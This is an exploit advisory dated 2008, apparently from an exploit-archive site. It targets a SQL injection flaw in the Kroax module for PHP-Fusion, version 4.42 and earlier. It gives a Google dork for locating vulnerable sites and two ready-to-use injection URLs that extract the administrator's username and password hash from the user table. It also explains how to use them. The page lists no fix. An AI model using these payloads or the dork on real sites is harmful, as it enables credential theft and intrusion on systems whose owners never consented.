PHP-Fusion Mod Kroax <= 4.42 (category) SQL Injection Vulnerability

2008-06-26 00:00:00

==========================================================
The kroax php_fusion Remote SQL-injection.
==========================================================

##################################
Author : boom3rang
Contact : [email protected]
webpage : www.khg-crew.ws
##################################


--- Remote SQL Injection ---

[+]Google Dork: inurl:"kroax.php?category"

--------------
Exploit
--------------

example:

www.site.com/infusions/the_kroax/kroax.php?category= [SQL]



[+] username:
www.xxx-site.com/infusions/the_kroax/kroax.php?category=-9999/**/union/**/all/**/select/**/1,user_name,3,4,5,6/**/from/**/fusion_users/**/where/**/user_id=1--&boom3rang


[+] password:
www.xxx-site.com/infusions/the_kroax/kroax.php?category=-9999/**/union/**/all/**/select/**/1,user_password,3,4,5,6/**/from/**/fusion_users/**/where/**/user_id=1--&boom3rang\


ps. To find username use first "SQL" with table_name user_name, and for password use second "SQL" with table_name user_password.




========================================================== Greetz to: All my Albanian brothers ==========================================================

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.